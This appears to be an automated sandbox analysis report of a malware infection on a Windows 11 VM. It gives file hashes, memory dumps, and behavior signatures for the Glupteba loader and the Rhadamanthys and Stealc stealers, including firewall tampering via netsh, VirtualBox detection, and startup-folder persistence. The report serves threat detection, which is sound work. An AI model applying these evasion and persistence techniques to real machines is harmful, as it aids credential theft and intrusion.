SHA256 f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA512 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147

memory/4640-83-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4912-87-0x00000000008D0000-0x000000000093E000-memory.dmp

memory/4912-89-0x00000000745E0000-0x0000000074D90000-memory.dmp

C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/4912-102-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1464-104-0x0000000002720000-0x000000000276A000-memory.dmp

memory/1464-106-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/5084-107-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1464-108-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-110-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-112-0x0000000000C70000-0x0000000000C71000-memory.dmp

memory/1464-113-0x0000000000C80000-0x0000000000D80000-memory.dmp

memory/5084-114-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4912-115-0x0000000002CA0000-0x0000000004CA0000-memory.dmp

memory/5084-116-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\un4.0.exe

MD5 ab1dbed7cd6c1bf01ab77d12d1b86cd8
SHA1 ccfd0f691e8e75ed0fb9a436032167cc633ce68b
SHA256 b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5
SHA512 1f83592156ee5479024aad34b1f856826c869758172d44b5d3052cf7b076ece37fde55a1d6ec572aceeac13172b48c65733c008f066fade447ec807837d26587

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

MD5 ba0d14f5874f5d2e7fb5c6a1a9b675dc
SHA1 a99194ec87f921dfc74890dda2b5db6372a44547
SHA256 6d1698c7355202b13ab98193ca2b3cf9e159de306885b630c7a5714a0aa651df
SHA512 88f8357c673b49f0896721a68fc330497579d082b772f8640db96198c92edb5aca5239f39b6a427f748d49d2288ce876c1458f321d1ceb88adec1bc437385741

memory/1352-142-0x0000000002BA0000-0x0000000002FA8000-memory.dmp

memory/856-143-0x0000000000B80000-0x0000000000BA7000-memory.dmp

memory/856-144-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1464-146-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-150-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-151-0x0000000003190000-0x0000000003290000-memory.dmp

memory/4912-149-0x00000000745E0000-0x0000000074D90000-memory.dmp

memory/1464-148-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-147-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-153-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-154-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-159-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-160-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-158-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-157-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-162-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-164-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-163-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-156-0x0000000003190000-0x0000000003290000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\un4.1.exe

MD5 eee5ddcffbed16222cac0a1b4e2e466e
SHA1 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA256 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA512 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

memory/1464-174-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-173-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-175-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-180-0x0000000003190000-0x0000000003290000-memory.dmp

memory/5084-181-0x0000000003720000-0x0000000003B20000-memory.dmp

memory/1464-182-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-185-0x0000000003190000-0x0000000003290000-memory.dmp

memory/5084-184-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp

memory/1464-187-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-189-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-194-0x0000000003290000-0x00000000032D0000-memory.dmp

C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe

MD5 4204b9d4c4df5c4b4d67922db24f342a
SHA1 9255b5e94028f3f55adda2576d60bd39452eaf08
SHA256 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
SHA512 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423

memory/1464-195-0x0000000003290000-0x00000000032D0000-memory.dmp

memory/1404-193-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/5084-188-0x0000000076490000-0x00000000766A5000-memory.dmp

memory/1464-183-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1404-205-0x0000000002AB0000-0x0000000002EB0000-memory.dmp

memory/856-207-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1404-215-0x0000000076490000-0x00000000766A5000-memory.dmp

memory/1404-209-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp

memory/5084-179-0x0000000003720000-0x0000000003B20000-memory.dmp

memory/1464-178-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-177-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-176-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1464-155-0x0000000003190000-0x0000000003290000-memory.dmp

memory/1352-145-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/440-257-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-259-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-275-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-271-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/832-284-0x0000000000400000-0x0000000000B0D000-memory.dmp

memory/440-283-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/440-281-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/440-262-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe

MD5 bd950871b09f9fcfa3466fb1b2b5d556
SHA1 0722e0ddae63ea95c95fb2fa49300c452de8ddc1
SHA256 e73bcab8e2404cb75d65a8ccd9f256d87ad77f432663f04487628afd12a30051
SHA512 f7cad1bc16d3aa8456c15f5c57828afa5d6d764aed2b23b71ac8f95ad51796be17e14943c7c97133414f7f92c91b741f3c773ed6266597e9c78d7970ccaee2b7

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403281421293134424.dll

MD5 2c8ab707b79399f1cbaf2cd17003d614
SHA1 034bd6bbd7123627ca202b6b35b9018261fc03d5
SHA256 c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede
SHA512 d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 5f5e97ba939baf708a1b2b1bb7acbb7e
SHA1 194294ed2caec5608dbe4b9f3d00bbf9f738050e
SHA256 733e6e77f50f0e5e30df357748ae8cddde48e6a35e50ec77f84765e8e19215a8
SHA512 94acf10f3b6bf77c5ed01932ee3607deede25cbb453cf3ab7a8ae5f5775d2152d88508b991efacf264d5e7b51880de59fbdf0ed7932ee940cd223d1de8b9e800

C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe

MD5 aaab26342c7e93c5b29fcaec60dd84d9
SHA1 a02b822ee13767ca224a37494adda8ad3b34db92
SHA256 30b64050f5874a74cb1ddc70578c6c30d70edd4d43f8b91f4597aa3d1a405648
SHA512 ad01fdbac1fa2b3ccf62d4c76d458bb5288a6e1664a6188417e5872104474567765ff364e66c5a66d350f921c542a43fde1ba301af60b76bac35d0c7541c9097

memory/1464-406-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/4640-413-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2980-415-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe

MD5 19024664b4bd6c49e4d898317b4a2a33
SHA1 f6d8c538ab5444df258ffd2d958bd4db65997bd9
SHA256 11b47b3d9cf14562aabfaa2e4e9e67ebbb00fb3e31f9f44f148d03cd3fc3da37
SHA512 2d0f64c5ca2e1ea9af44e5c7b836efe7d02feb29915f148ce2e69ab70435a57dbe15f26a2e096d414f1cdad87066c8486397cf3de982afbe1aea74bc4def0475

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4elbyuy.asy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe

MD5 b119ea556def66eaa9f751a650b45af0
SHA1 daf3fa0325b110183d0a233b4b0d1875f0b49ca8
SHA256 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4
SHA512 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4

memory/4912-466-0x0000000010000000-0x00000000105E5000-memory.dmp

memory/856-479-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1352-491-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4232-502-0x0000000000400000-0x0000000000930000-memory.dmp

memory/440-504-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp

memory/4640-515-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2980-517-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1d7f3d1036cc09d2b9c5d8d5acfbb867
SHA1 5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85
SHA256 0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c
SHA512 dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 86526e07bf8a7bf6bfbd055d4ef90965
SHA1 7f0f00e327905b09a38771f3aaa445fb79c999d2
SHA256 66344994362215c8fd590e6a64db279aceb65dab68303b9d664087966d33b92b
SHA512 76ce10a825c2bdfb1cd3618c81c4311d5a45af970934d2d2d085b61fb3dccefca39e7db2418cc077ffc0c2152d98041287289d83cf12243d1f85fb49531ff0cd

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\opera_package

MD5 856c0e24f5ee9715ee77bd4fef0995ae
SHA1 02b109c418bfdee0fc725faa35f8c45ae0725929
SHA256 74e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1
SHA512 242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff

memory/4640-585-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b3277d222d933b2d9999772f3be64c86
SHA1 1122893d91bbfe786382afbd8e24efe4cd49b71f
SHA256 0b36857c72ffd39300006901e9bad42720add740cdd4dfd890baf868ce775c2b
SHA512 d20f3c6ed3cc7f1a90acf35fa8410ff9e2f2d8ef4c005812012e94f15b287165f2fd8830b932cfc9150fa28652004c2bbc83d45f67132a3b22210701e5353aaa

memory/1352-605-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/3536-615-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/4232-675-0x0000000000400000-0x0000000000930000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b7730734a19453b63c20f753914ec7e0
SHA1 6fb18889f2a3f9ae06447abfc8fdf9ad6e119661
SHA256 ee77e6e66a80a6657be8c355021ea18520da80a54ac61915c681fef7163c6b74
SHA512 c53972c47b738821be5c59dc282eb7ac61db18294ccad806fd592f8c51d3732dcc1137699a638767546d3ecc496761cef34a1c471631203c93f4e4cefad25bd8

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 29e28e9da37e4900bc6113254ee685c3
SHA1 9ff27a74c5e5c77a4d6b12d3582a04b2a527bfef
SHA256 b747fa492595344414e5f008b1092086c3a1a6e92cb03886be17eddbedb267cd
SHA512 c618bf7587fe0d90d4b27348de1c6ed4e6fe9a5118509c1970201fcc425544589b8372eef45fe5468c693a25168522264d88672bc15d63346d91fde5b97d12ce

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\additional_file0.tmp

MD5 20d293b9bf23403179ca48086ba88867
SHA1 dedf311108f607a387d486d812514a2defbd1b9e
SHA256 fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA512 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbgcore.DLL

MD5 8b6f64e5d3a608b434079e50a1277913
SHA1 03f431fabf1c99a48b449099455c1575893d9f32
SHA256 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512 c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbghelp.dll

MD5 925ea07f594d3fce3f73ede370d92ef7
SHA1 f67ea921368c288a9d3728158c3f80213d89d7c2
SHA256 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512 a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

MD5 b3f05009b53af6435e86cfd939717e82
SHA1 770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA256 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
SHA512 d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

memory/2980-842-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6048-893-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6092-894-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/6140-896-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/856-921-0x0000000000400000-0x0000000000AEA000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 9617ff9799fe2a5905f4f2bb40301428
SHA1 fe8e85956516141380711524c31158b10c74d98a
SHA256 40ebeab3c0fe603a36fed5f862bc68b9db0b0658e601e7442f50e9a9b375f000
SHA512 69a3e6e0e3308ab6ea07fb26f88223d9f746f652fe86cc63454c0e65c465bc936b0f39a7a2bf279737beae8502127dcb146df2d0b9e17380ec3ed9f273665804

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xh4b7nwe.default-release\prefs.js

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\__data__\config.txt

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-28 14:21

Reported

2024-03-28 14:23

Platform

win11-20240221-en

Max time kernel

149s

Max time network

149s

Command Line

sihost.exe

Signatures

Glupteba

loader dropper glupteba

Glupteba payload


Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Rhadamanthys

stealer rhadamanthys

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3208 created 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\system32\sihost.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QzEYoAWx4smjRu1kZKqmayrp.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lmh2KmV2PnvgDuj8Qe9u335v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t05whX2SIYE8oQqG8v96EfkB.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\78orv5C8hDfSdiFoTzVFxemj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ea41sbCuHfyirBCvzFZ4JQZW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Kzs6FglmbP4kUg9GHssTg5I.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJ3wYiLxvfbSPc6hk9fHkViy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzmgzDQiucq87nB3zKcki3TK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\05xsiZf5NWRDpjyI705Ae2F6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11HR7BA0lP5cYmruMGs6N6F7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jqBiZZSu8iVMb3snbvzQSdzy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
N/A N/A C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe N/A
